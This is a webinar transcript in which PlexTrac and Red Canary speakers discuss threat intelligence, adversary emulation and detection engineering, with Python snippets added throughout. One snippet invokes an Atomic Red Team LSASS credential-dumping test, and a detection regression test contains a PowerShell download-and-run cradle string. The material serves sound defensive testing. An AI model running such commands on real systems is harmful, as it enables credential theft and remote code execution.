
VIDEO

Empowering Adversary Emulation: Threat intel, tools, and tactics for success

We all know that proactive security based on actual threat intel is the best way to prevent and mitigate attacks; however, connecting the dots from threat intelligence to adversary emulation to detection and remediation is complex. Keith McCammon, co-founder and CSO at Red Canary, talked with PlexTrac’s Dan DeCloss about taking your proactive security efforts full circle. They discuss aggregating and sharing threat intel, getting started with adversary emulation, and finding the right tools and strategies to achieve visibility into your security posture.

Series: Friends Friday (A PlexTrac Series), On-Demand Webinars & Highlights

Category: Thought Leadership


Transcript

Hey, everybody. Happy Friday. Thank you so much for tuning in to our Friends Friday cast here. We are so grateful that you spent some time with us this morning or afternoon, wherever you’re at, and super excited to have Keith McCammon on the cast today from Red Canary. Keith, why don’t you do a brief intro of yourself because we’re excited to have you.

Absolutely. Thank you, Dan. Yeah. I'm Keith McCammon, one of the co-founders and chief security officer at Red Canary. Long-time cybersecurity wonk, worked on the offensive and defensive sides of cybersecurity for some time, and I always enjoy our chats. So it's fun to be able to have one of those in this format. Thank you again for having me.

Oh, yeah. Thank you. Thanks for taking some time and spending it with us, always. That's what we've really enjoyed about this new cast we've been doing: just being able to chat with really fun and smart people. So, appreciate you taking some time to do this for us. Today we're going to be talking about adversary emulation and the goals around an adversary emulation program, and tying in threat intelligence: how do you utilize threat intelligence in an adversary emulation program to improve your detection and response capabilities?

Right. Because obviously Red Canary is very well known, especially in the MDR space, so you guys get exposed to a lot of data. So maybe tell us a little bit about what kind of information you're seeing in the world on a daily basis, even in your core service offering, and how that plays into the conversation today.

Yeah, absolutely. And this stuff is all obviously very cyclical, so it's a fun and easy topic in that we can start anywhere and end anywhere. But for us, job one, and I think for all cybersecurity practitioners, is to figure out how to find an adversary and stop them as quickly as possible. And so in service of that, particularly from an intelligence standpoint, we're always, like everyone, keeping an eye on news, open source intelligence, working with partners. That's the really wide aperture of intake we deal with. And then the most useful thing for us is always going to be the first-party intelligence that we produce.

Right. We take that wide aperture and try to figure out, in the middle of it, where do we need to be in order to see adversaries in the first place? Just to have visibility into the systems where they're operating: what data sources do we need? And from there, that's the bridge between traditional threat intelligence and how it gets kicked over into threat research and detection engineering, right? Implementing systems and analytics and ultimately putting those investigative leads in front of people so we can make good decisions. From an intelligence standpoint, we see across devices, primarily endpoints like Windows, Mac, Linux, but also the cloud control plane and the identity layer in particular, which has become probably the most important today and moving forward. And so we see a pretty broad cross-section of those. Customers use different technologies, usually all in those same domains, right? Endpoint, identity, cloud, et cetera.

But the cool thing is we get to see that through the lens of an Okta or an Entra ID, or through the lens of a CrowdStrike or a Defender for Endpoint or a SentinelOne. And so for us, from an intelligence standpoint, going back to conversations we've had before, it's: how do you take things from as diverse a set as possible and distill that down? To me, that's really where it gets interesting, as a community and an industry trying to figure that out, because we're all seeing very different things at very different stages.

Red Canary will see very early-stage activity. That's where we play and where we really focus intently. If you turn around and look at intelligence that a Mandiant or an incident response firm produces, they're seeing late stage: the intrusion has happened, usually there's been some consequence, and they're working backwards. So hopefully that's helpful framing in terms of the signal we see, but also where in that intrusion lifecycle we live and work.

Yeah, well, and I think that's why we wanted to chat, because the very traditional approach of utilizing threat intelligence and exposure information is really to help identify: hey, do we have these IOCs in our environment, from a hunting perspective, and more traditionally, would we be able to detect and respond if something like this got triggered? That's the traditional approach, which is a very good approach for using threat intelligence. And I think what we're seeing, when we talk about moving from the reactive to the proactive, is that you can still utilize that threat intelligence, and that's where the notion of adversary emulation comes into play, right?

Yep. Yeah, absolutely. Looking at Atomic Red Team and things like that, right, which is much more granular. A ton of the value there is in trying to figure out, when you see a real-world incident, how do you abstract that sequence of events? You can test them very individually, which I think was the spirit of Atomic when it started. But so much of the promise is in figuring out how to chain these things together in a way that makes it easy to understand, in a very practical way: this adversary will do these things, roughly speaking, in this sequence. Being able to make that type of intelligence more accessible is game-changing, when and where we can do it. That eliminates so many barriers, because for a long time I feel like it was a really small cross-section of the industry that even had that information to begin with. And now anybody can have what we have, which is great.
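To make that chaining idea concrete, here is a minimal sketch in Python. It assumes the open-source Invoke-AtomicRedTeam PowerShell module is installed and that pwsh is on the PATH; the technique IDs and test numbers are illustrative, not a vetted emulation plan.

# Minimal sketch: chain a few Atomic Red Team tests into a rough intrusion sequence.
# Assumes the Invoke-AtomicRedTeam PowerShell module is installed and `pwsh` is on PATH;
# the technique IDs and test numbers below are illustrative, not a vetted emulation plan.
import subprocess

SEQUENCE = [
    ("T1059.001", 1),  # Command and Scripting Interpreter: PowerShell (execution)
    ("T1003.001", 1),  # OS Credential Dumping: LSASS Memory (credential access)
    ("T1021.002", 1),  # Remote Services: SMB/Windows Admin Shares (lateral movement)
]

def run_atomic(technique_id: str, test_number: int) -> int:
    """Invoke a single atomic test via the Invoke-AtomicTest cmdlet."""
    cmd = f"Invoke-AtomicTest {technique_id} -TestNumbers {test_number}"
    result = subprocess.run(["pwsh", "-NoProfile", "-Command", cmd])
    return result.returncode

if __name__ == "__main__":
    for technique_id, test_number in SEQUENCE:
        print(f"[*] Running {technique_id} test {test_number}")
        rc = run_atomic(technique_id, test_number)
        print(f"[*] {technique_id} exited with {rc} -- now check what your detection stack saw")

Run something like this only on a lab host you are authorized to test, and use the module's -Cleanup switch afterward to undo test artifacts.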

Well, and I think that's a testament to the evolution of our field, too, right? Because for the longest time, we didn't have the resources to really know how these advanced threat actors behave and what procedures they're using to get into the bigger environments. And now we have that. We've got MITRE ATT&CK, which has really exploded, which is great. I'm a huge fan of it, and I know you guys are, too.

And then something like Atomic Red Team, where you've got the resources to actually say, hey, I can take this and go test for it without needing any kind of automation. I genuinely can sit hands on keyboard and emulate some of these activities that threat actors are performing. What do you think made the difference on the threat intelligence side, in being able to aggregate more together and share it differently? Has it just been more organic, or do you think there was something different there?

I would say honestly the single biggest catalyst probably was, and still is, ATT&CK. Prior to that, again, there were a small number of shops doing rigorous threat intelligence research and reporting, but by and large everyone had their own language and their own taxonomy. It was great that that stuff was being published, but the barrier to entry for putting together a program capable of doing that was super high, right? So I think that was absolutely the single biggest catalyst: just having that common language, but also that taxonomy and that structure. And as that's evolved over the years, it's continued to make things easier and easier. Prior to that, you had your ISACs and places like that, and you had a mix of commercial and open source intelligence platforms. It was great and it worked, but it worked for such a small cross-section of the industry, and everyone else was left behind. There was just no hope, right? If you're a small shop, you're not setting up a MISP instance and federating with an ISAC and doing all these crazy things, and you're sure as heck not figuring out how to extract from that a really easy-to-understand, usable adversary emulation plan. That was just so far beyond anyone's reach. So I think the advent of ATT&CK, and everyone having it as an interchange format, has been game-changing.
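As a small illustration of that common language, the sketch below (Python; it assumes the public enterprise ATT&CK STIX bundle is still published in the mitre/cti GitHub repository) builds a lookup from technique IDs to names, the kind of interchange that lets a pentest report, a detection backlog, and an emulation plan all reference the same thing.

# Sketch: turn the public ATT&CK STIX bundle into a simple technique-ID -> name lookup,
# the "common language" that lets intel, testing, and detection work reference the same thing.
# Assumes the mitre/cti repo still hosts enterprise-attack.json at this path.
import json
import urllib.request

ATTACK_URL = (
    "https://raw.githubusercontent.com/mitre/cti/master/"
    "enterprise-attack/enterprise-attack.json"
)

def load_technique_names() -> dict[str, str]:
    with urllib.request.urlopen(ATTACK_URL) as resp:
        bundle = json.load(resp)
    names = {}
    for obj in bundle.get("objects", []):
        if obj.get("type") != "attack-pattern" or obj.get("revoked"):
            continue
        for ref in obj.get("external_references", []):
            if ref.get("source_name") == "mitre-attack":
                names[ref["external_id"]] = obj["name"]
    return names

if __name__ == "__main__":
    techniques = load_technique_names()
    for tid in ("T1566", "T1059.001", "T1021.002"):
        print(tid, "->", techniques.get(tid, "unknown"))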

I agree, I agree. And that's what I've always loved about it too, from the pentester side of the house. This is how we've always tried to speak to customers, or our industry, or enterprises: hey, while we have a lot of other things we should be focused on in the security program, compliance and risk and governance and all of that, at the end of the day we are in the mission of trying to identify where we're most vulnerable, how an attacker is going to breach our environment, and what their techniques will be for extracting information or getting to the crown jewels, whatever the mission or objective may be. So it brings that normalized nomenclature: these are the general steps an attacker is going to be taking, right? Reconnaissance, lateral movement, code execution. I think that's been very influential from the pentester side of the house, because that's how we're trying to emulate attacks in people's environments.

Yeah. It'd be interesting to get your take on this, having done it before and doing it now, because you've seen that whole arc. But one of the things that we encourage, and I'd say the mantra and the spirit of Atomic Red Team in general, not just the open source project, is that the best test is the one that you can do every single day. It's honestly just establishing that drumbeat. We liken it to healthcare, right? Take your vitamins, do this as often as possible. It doesn't have to be big, it doesn't have to be really complex.

And I'd say, from a provider standpoint, a small number of our customers have a red team. Most of them that do any testing hire someone. Think back eight or ten years: the most common practice was that, as a customer or an organization, you were exposed to as much testing as you could afford from a consulting standpoint. And it was good that they did a red team or a pentest once a year; it's better than not doing it at all. But the problem was that that would happen, and then ten or eleven months would go by and nothing would happen. You'd take your report, your leave-behind, when you finished an engagement, and that was it. I'd say maybe the most game-changing thing from an organizational standpoint is having ATT&CK and, whether it's Atomic Red Team or not, just so much of this tradecraft being exposed and easier to find, because you can search for a fairly specific technique or stage of an intrusion. Now what we see is someone hires a firm, they come in, they do the test, but that leave-behind is orders of magnitude more useful. That customer can turn around 30 days later and step through all the tools, all the tradecraft, all the tests and procedures. It's all right there. So 30 days later they can make some improvements and literally go and effectively redo it. They can reproduce your work. And that alone is game-changing, right? The testing you can do is no longer a function of just the dollars you can throw at a third party. Even if you don't have a big, super-experienced internal team, that barrier has come way down.
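One way to picture that reproducible leave-behind is as data rather than a PDF. The following sketch is hypothetical (the field names, sample findings, and retest commands are placeholders): each finding carries its ATT&CK technique and the exact procedure the tester ran, so the internal team can step back through it 30 days later.

# Sketch of a machine-readable "leave-behind": each finding carries its ATT&CK technique
# and the exact retest procedure, so the internal team can reproduce the tester's work later.
# Field names and the sample entries are hypothetical placeholders.
from dataclasses import dataclass

@dataclass
class Finding:
    technique_id: str      # ATT&CK technique the finding maps to
    title: str             # what the tester found
    retest_command: str    # the procedure to reproduce it
    remediated: bool = False

LEAVE_BEHIND = [
    Finding("T1059.001", "Unrestricted PowerShell execution on workstations",
            "Invoke-AtomicTest T1059.001 -TestNumbers 1"),
    Finding("T1021.002", "Lateral movement over admin shares not detected",
            "Invoke-AtomicTest T1021.002 -TestNumbers 1"),
]

def retest_checklist(findings: list[Finding]) -> None:
    """Print the still-open findings as a step-by-step retest plan."""
    for f in findings:
        if not f.remediated:
            print(f"[ ] {f.technique_id} {f.title}\n    retest: {f.retest_command}")

if __name__ == "__main__":
    retest_checklist(LEAVE_BEHIND)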

Oh, 100%. Yeah. That's what we've been preaching for a long time: one, being able to move from a reactive state to a proactive state, and then shortening the cycle on how quickly you can identify what you should be testing, and testing for it on a regular basis. Right? It is that daily hygiene, kind of apple-a-day type of thing. And that's what I've loved about ATT&CK and even Atomic Red Team: you can go as broad and wide and deep as you want, or as narrow as you need to, and you don't have to have 100% of the skill set of a seasoned, veteran red team or pentesting team to at least identify some of the things you probably know you should be fixing.

Right? And I have a prime example of this. When I was a security director, before we started PlexTrac, we did something very similar. We got into the mindset of being in an agile framework: hey, we want to do some testing on a regular basis, because this was still what I knew we should be doing. So every two weeks we focused on a general tactic. We knew our environment pretty well, so we had a general idea of where our gut said we might have some weaknesses. We started with lateral movement: let's do as much lateral movement testing as we can in this two-week sprint, and then see where we're at.
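If you wanted to scope a sprint like that programmatically, the same public ATT&CK bundle used in the earlier sketch can be filtered by tactic. This is one possible approach in Python; it simply prints a handful of techniques tagged with the lateral-movement kill-chain phase to seed a two-week backlog.

# Sketch: scope a two-week sprint to one tactic by filtering the ATT&CK bundle
# for techniques in that kill-chain phase (here, lateral movement).
# Assumes the same public enterprise-attack.json bundle as the earlier sketch.
import json
import urllib.request

ATTACK_URL = (
    "https://raw.githubusercontent.com/mitre/cti/master/"
    "enterprise-attack/enterprise-attack.json"
)

def techniques_for_tactic(tactic: str) -> list[tuple[str, str]]:
    with urllib.request.urlopen(ATTACK_URL) as resp:
        bundle = json.load(resp)
    picked = []
    for obj in bundle.get("objects", []):
        if obj.get("type") != "attack-pattern" or obj.get("revoked"):
            continue
        phases = {p.get("phase_name") for p in obj.get("kill_chain_phases", [])}
        if tactic not in phases:
            continue
        tid = next((r["external_id"] for r in obj.get("external_references", [])
                    if r.get("source_name") == "mitre-attack"), None)
        if tid:
            picked.append((tid, obj["name"]))
    return sorted(picked)

if __name__ == "__main__":
    # Seed the sprint backlog with a handful of lateral-movement techniques.
    for tid, name in techniques_for_tactic("lateral-movement")[:5]:
        print(tid, name)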

And it's so much more informative, because then it's like, okay, we actually identified some gaps and we'll go fix those now. Rather than waiting an entire year, because if you have a yearly pentest, that's still good to do to get fresh eyes on things, but the techniques and procedures that change from one year to the next can be so drastic that you're not truly preparing yourselves.

Right. But I'd say there's also a counterpoint to that, which is that for every one of those things that does change, there's a lot that doesn't. And to the point you make, it's like this picture I always draw when I do these talks: take a big thing you're worried about, like ransomware or an account compromise, and then for us, we break that down into threats, right? That's the next level. A threat might be a tool like a Cobalt Strike or something like that, or a threat might be a group or an adversary, if they have a name. But then what we're always looking for, in our own reporting and everyone else's, is breaking that down further and asking: from the earliest sign that this threat has materialized in your environment, what are the first behaviors and signals you're going to see?

And I love the idea of boxing that in and saying, hey, we're working right here: the earliest-stage sign that we've got this thing showing up. Let's just spend a week on it.
And that's always going to be an interesting mix. Those techniques don't really drift much year over year. We've talked a ton about this, right? Those top 10 to 15 techniques that we see show up day after day after day, there's not a ton of drift there, even when you look back three, four, five years. The procedures, the implementations, change, sometimes significantly, sometimes slightly, and that's where all the variability is. But if you can take that and box it in and say, hey, cool, we're working on very early-stage initial access.
Here's the threat, here are the techniques. That makes it super approachable, man. You just step through, and when you get to the end, sure, start back at the beginning; things will have changed.

And that's where the threat intelligence comes in really handy on the proactive side: hey, this procedure has changed. It's the same general tactic of privilege escalation and the same general technique of using PowerShell or something like that, but the actual command or the prompt or the vector may be slightly different. That's where threat intelligence can inform you and say, hey, we've been testing for this; now throw this one into the mix too. Right?

Yeah. And one of the things that's always excited me about what you all have done, even from a product standpoint, is the systems approach to doing that: you do your test, you have your findings, and then, most importantly, you have the things you need to change. What's really interesting is that the organizations doing that are taking their vitamins, testing regularly. Every year when we put out our Threat Detection Report, the single biggest observation is: hey, there are some new things in here, but keep an eye on what didn't change. If you're doing that testing and then saying, hey, cool, we've got a visibility gap here, there's a set of signal we need that we're not getting, and you take that finding, peel it out, and make sure that's the thing you focus on, it's amazing. Your defensibility is leveled up incredibly, forever. It's taking that approach of breaking things down, time-boxing or isolating your tests, focusing on a particular area, but then taking a rigorous approach to root cause analysis. Why did we not see this thing? How could we have seen it sooner? How could we have shortened our time to respond to it? Even if you're just doing that once, that level of rigor is just good incident management, honestly: seeing an incident through, but really focusing on visibility gaps and vulnerabilities, whether software, configuration, or human.

And once you've closed those, and I think most organizations still aren't at the point where they're doing this, but once you do and that flywheel starts to engage, you're closing really small gaps from that point forward. It doesn't take very many of those findings before you've made it so much more difficult for any adversary to operate. Not just that threat: most threats are going to use a common set of initial access techniques, no matter who or what they are. As you start to close those gaps and build some rigor in there, you find that over time you've built something that's pretty difficult to evade. There's just a ton of promise there. If anything, the question is how we get more people to do that. Maybe not every week, but even if you do it once a month, your ability to defend against even a sufficiently advanced adversary is game-changing forever.

You know, I'd be curious what you think, because on the detection and response side, there's a lot of time spent on: how would we detect if this thing happened in our environment, and what would our mean time to respond or remediate be? I'd be curious, tying that back into the proactive side, about your thoughts and advice on how to do that. I have some thoughts of my own, but I'd love yours.

Yeah, well, I'm not 100% certain I understand the question there, but, I guess...

Yeah, I guess what I was saying is that security teams spend a lot of time on the detection engineering piece, right? Configuring those IOCs so that, hey, if this happens, we know we'll get an alert. What would be your advice on spending as much time on the proactive side as we do on the detection and response side?

I got it. Yeah. First of all, I'd say taking an engineering-driven approach to that is absolutely the right way. That's how you ensure continuous improvement. But to your point about how to balance the proactive and the reactive: one of the things we've always felt super strongly about, and I'd hypothesize this is true, is that our detection engineering team spends easily as much time on testing and writing tests as it does writing analytics, and then continues to pressure-test those areas where we expect adversaries to keep incrementally innovating or evolving within a technique space.
I mean, 50-50 is actually, I think, a great and very realistic rule, right?

For a long time, I think the mindset was: just keep cranking out more analytics and keep tuning them. And that's super dangerous in a bunch of ways. One of our deeply held beliefs is that we actually want our analytics to be fairly broad. We're fine with false positives; you build a workflow and a system that makes it easy for an analyst to make a decision and say, hey, this is okay, and why, and you codify that and it goes back and feeds into the machine. But you don't want to spend all your time writing more analytics and tuning them to the point that they're surgically accurate, because by definition, if you've got an analytic that surgically accurate, it doesn't take much of a change for that thing to fail. And then you may never see it again.

So take the approach where it's: cool, get a bead on the adversary, ensure you've got good visibility, build your detection at a technique level that's practical given your platform and your constraints. But then most of your time shifts immediately into that proactive stance. Let's write tests for this thing. Let's start thinking about where the permutations are going to be, where the changes are. If you're looking at PowerShell command lines, there's a whole world there; it's effectively its own complete language, and there's a thousand ways to do any one thing. So once you get a bead on a technique, particularly one you know is going to be highly prevalent, spend as little time as possible writing analytics and trying to select out data, and spend as much time as possible being proactive. Test from a software detection-engineering standpoint: make sure you've got regression tests built in, make sure you've got unit tests built if you're doing it at scale. But also do the very applied testing: go and run these things, read new intelligence, throw as many things into that system, fire as many tracers as you can, and make sure it's going to work when it matters.
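A concrete way to hold that 50-50 balance is to treat each analytic like code with its own regression suite. The sketch below uses Python and pytest; the broad PowerShell analytic and the sample command lines are hypothetical, the point being that every permutation an adversary might use becomes a test case that has to keep passing.

# Sketch: regression tests for a deliberately broad PowerShell analytic.
# The rule and the sample command lines are hypothetical; the point is that each
# permutation an adversary might use becomes a test case that must keep passing.
import re

SUSPICIOUS_POWERSHELL = re.compile(
    r"powershell(\.exe)?.*?(-enc(odedcommand)?|-nop\b|downloadstring|iex\b|frombase64string)",
    re.IGNORECASE,
)

def analytic_fires(command_line: str) -> bool:
    """Broad detection: flag PowerShell invocations with common abuse markers."""
    return bool(SUSPICIOUS_POWERSHELL.search(command_line))

# pytest will collect these automatically: `pytest this_file.py`
def test_encoded_command_variant():
    assert analytic_fires("powershell.exe -NoP -Enc SQBFAFgA...")

def test_mixed_case_and_long_flag():
    assert analytic_fires("PoWeRsHeLl -EncodedCommand SQBFAFgA...")

def test_download_cradle():
    assert analytic_fires("powershell -nop -c \"IEX(New-Object Net.WebClient).DownloadString('http://x')\"")

def test_benign_admin_script_does_not_fire():
    assert not analytic_fires("powershell.exe -File C:\\scripts\\inventory.ps1")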

Yeah, exactly. And that's my opinion, too. As much time as is spent on the detection and response capabilities for alerting should also be spent on actually identifying whether you have the gaps, and what the variance can be. As you said, they may be running this command, and our detection signature, in Carbon Black or whatever system, says this is the way it's going to be run. If we tweak it at all, or change the encoding on the payload, does it still fire? Right?

So I would suspect there's a lot of testing being done around whether the alert fires, as opposed to, and that's great, you still want to know if the alert fires, but are you also actually testing for the gaps you have in the environment? Right.
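To that point about tweaking the encoding, one cheap way to test it is to generate a few equivalent variants of the same harmless command and replay each one. This Python sketch is illustrative: it emits the same PowerShell one-liner in plain, mixed-case, and -EncodedCommand form so you can confirm the alert fires on all of them, not just the literal string in the signature.

# Sketch: generate equivalent variants of one (harmless) PowerShell command so you can
# replay each and confirm detection fires on all of them, not just the literal signature.
# The base command and variant set are illustrative only.
import base64
import random

BASE = "Write-Output 'detection-test'"

def mixed_case(s: str) -> str:
    """Randomly toggle case; PowerShell command names are case-insensitive."""
    random.seed(7)  # deterministic so test runs are repeatable
    return "".join(c.upper() if random.random() < 0.5 else c.lower() for c in s)

def encoded_command(s: str) -> str:
    """PowerShell's -EncodedCommand expects Base64 over UTF-16LE text."""
    return base64.b64encode(s.encode("utf-16-le")).decode()

def variants(cmd: str) -> list[str]:
    return [
        f"powershell.exe -Command \"{cmd}\"",
        f"powershell.exe -Command \"{mixed_case(cmd)}\"",
        f"powershell.exe -NoProfile -EncodedCommand {encoded_command(cmd)}",
    ]

if __name__ == "__main__":
    for v in variants(BASE):
        print(v)   # run each on a test host and confirm the same alert fires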

The key to incident response is knowing you have an incident in the first place, right? It's really easy to fixate on the more mechanical stuff and lose sight of the bigger picture. You might have a perfect analytic and feel really good about your detection in this area, but there's a whole lot more. That fundamental red team philosophy, which extends very much into purple teaming now, which is great, that more collaborative version of it, is about really pressure-testing the hypothesis. All right, cool: we feel great about this super early-stage signal and our detection, and we know what to do. Now let's play it out. Let's pretend they find another way in entirely. What's the next thing they're going to do, and do we feel as good about thing B as we do about thing A?

And that only comes through constant experimentation, being super proactive, and a mindset that assumes any one of those stages, processes, or opportunities will fail, and makes sure the whole system still works. That, right there, is the difference between doing atomic testing and detection engineering at a granular level, which is important, and adversary emulation. The importance of adversary emulation is that it plays out the whole attack from start to finish, with as much variability as you can afford to introduce over time, and makes sure the whole system works, because if the whole system doesn't work, none of the system works. So you've got to make sure that if you miss a thing here, you feel good about your opportunity to pick it up at the next stage.
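One way to operationalize "catch it at the next stage" is to record, for each end-to-end emulation run, which stages produced an alert and flag any two consecutive misses. A minimal sketch follows; the stage names and results are hypothetical.

# Sketch: after an end-to-end emulation run, flag any two consecutive stages that both
# went undetected -- the "whole system" failure mode, as opposed to a single diving save.
# Stage names and results below are hypothetical.
STAGES = ["initial-access", "execution", "privilege-escalation",
          "lateral-movement", "exfiltration"]

def consecutive_gaps(detected: dict[str, bool]) -> list[tuple[str, str]]:
    """Return pairs of back-to-back stages where nothing fired."""
    gaps = []
    for earlier, later in zip(STAGES, STAGES[1:]):
        if not detected.get(earlier, False) and not detected.get(later, False):
            gaps.append((earlier, later))
    return gaps

if __name__ == "__main__":
    run_results = {
        "initial-access": False,      # phish landed, no alert
        "execution": True,            # PowerShell analytic fired
        "privilege-escalation": False,
        "lateral-movement": False,    # back-to-back miss with the stage above
        "exfiltration": True,
    }
    for earlier, later in consecutive_gaps(run_results):
        print(f"[!] consecutive miss: {earlier} -> {later}; prioritize visibility here")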

Yeah. And I think just having some level of comfort, or not, in terms of how we're making progress, right? Like, last year we were nowhere close to being able to detect anything related to privilege escalation; now we can detect it; maybe next year we can actually prevent it. Being able to test on a regular basis is that iterative process, from both the defensive or reactive side and the proactive side.

Yeah, and we haven't really talked about that at all, but it is about moving upstream. I always say detection is critical: if you can only do one security operations thing really well, it's got to be detect and respond. And then you evolve out from that, like concentric circles. But I'm glad you called that out, because the ideal situation is that you learn enough about that attack surface to figure out how to mitigate it and take it away. Casey Smith and I did a fun talk years ago about the concept of battlefield shaping. The real goal in all of this is not to get great at diving saves. We built a ton of detection coverage at Red Canary; that is our bread and butter: be better at detecting the things that everything else has missed, and that's where we operate. But those are diving saves. Every single one of those is a miss away from an adversary making it one step further. And every step they progress, the stakes get higher, and you're working harder to find them, scope the intrusion, and mitigate it. Really what we want, when you talk about adversary emulation and systematizing it, the holy grail, is to move that upstream and get to the point where you're taking as much attack surface away as possible, forcing the adversary into choke points that you can defend really well and understand really well. You know how to respond, and you can operate almost with a hair trigger when things go bump. That concept of battlefield shaping is: steer the adversary into the small number of places that you can watch like a hawk, that you know better, where you understand what normal looks like. And when things go sideways, you can respond with a ton of confidence.

And once you're at that point, you're doing some really cool stuff, like detection on the margins. You can really innovate from a detection standpoint, just because you've taken away so many of those options and so much of that adversary's ability to maneuver. Yeah.

Yeah. We've already gone half an hour; I think we knew we could talk a lot about this kind of stuff, because we're both obviously super passionate about it. So, to land the plane: what would be some of your advice to folks on how to get started? What's the best way to start gaining more visibility and taking some threat intelligence into a proactive state?

From a proactivity standpoint, I think how this conversation came about was us trying to figure out: how do we aggregate, normalize, and share more intelligence across the whole industry, and then get it into the platforms that folks are using to prioritize their work, to do purple teaming, and to, again, systematize their security operations.

On proactivity in general, the number one thing I always recommend is this: there are great sources of free intelligence. Take even a few of those and make a really short list. The number of initial access vectors has not changed much in five or ten years; they trade places, and with the exception of the SolarWinds year, where you had the big supply chain blip, it's phishing and it's vulnerabilities. Figure out how folks are getting a foothold in the first place, instrument as much visibility as you can there, and then take all of this great open source intelligence that's available and figure out, again, the small number of techniques in each of those areas. To your point, just box them in. Don't worry about all the other things that could happen; there will always be more ways. Very granularly step through it: how are they getting in in the first place? Are we instrumented there? Do we have visibility? And then what are the most prevalent techniques? Again, there's not a ton of drift there year over year.

And just keep that flywheel moving. Every single time you, as a purple team, find a gap or a failure mode, fix it. I don't think many folks fully appreciate the massive gains you make: how much you increase the cost to the adversary, introduce friction into their process, and make your organization so much more defensible. The benefits are so additive over time that you end up in a terrific position. But it is one thing at a time, and ruthlessly prioritize for what's common. There will always be zero-days, there will always be apex adversaries, there will be the Stuxnets of the world and things like that. But that is not what 99.99% of us need to show up at work every day and worry about, instrument for, find, and respond to.

Yeah, and my advice, when people ask, is also: hey, don't feel overwhelmed. Like you said, starting somewhere and doing something every day is better than nothing. It's kind of like how the way you lose 20 pounds is you start on day one and take it a day at a time. It doesn't happen overnight.

Right? Yeah, get up and take a walk, man. Do that every single day.

Eat a little less. Something like that. Well, hey, Keith, thanks so much for spending some time with us today. Super engaging conversation. Tell us a little bit more about what you're working on; I know, but tell the audience, and let folks know how they can find you and whatever else.

Yeah. We're still working on Red Canary, going strong. To the point of what I've been working on, and where I hope a lot of this dialogue leads: we're always working on ways to figure out how we can learn from our peers and others in the industry. What do we know? What are we finding, seeing, and doing the hard way? Can we short-circuit that learning process or help other people get the benefits of it? So much of what I enjoy working on, and what we've been working on, is trying to figure out how we get more data, insights, and intelligence flowing freely, not just from Red Canary to the public, but from others like yourselves, and how we continue to lower the barrier to entry: product integration, community building, threat intelligence, being able to share that stuff and make it super actionable. That's where we're spending a lot of our time right now.

Awesome. Well, thanks so much again. Definitely appreciate the great conversation. Check out Keith on LinkedIn, same with Red Canary. They're a great group of folks; we love working with them, and obviously love working with you, Keith. So thanks again.

Happy Friday, everybody. We wish you the best, and hopefully you all have a great weekend and learned something. If you have any questions or comments, feel free to leave them in the chat and we will try to respond as soon as we can. Awesome. Yeah. Thanks for having me, Dan. Really appreciate it, man. This was a super fun format and conversation.

Yeah.

Have a great weekend. Thanks. You, too. Cheers.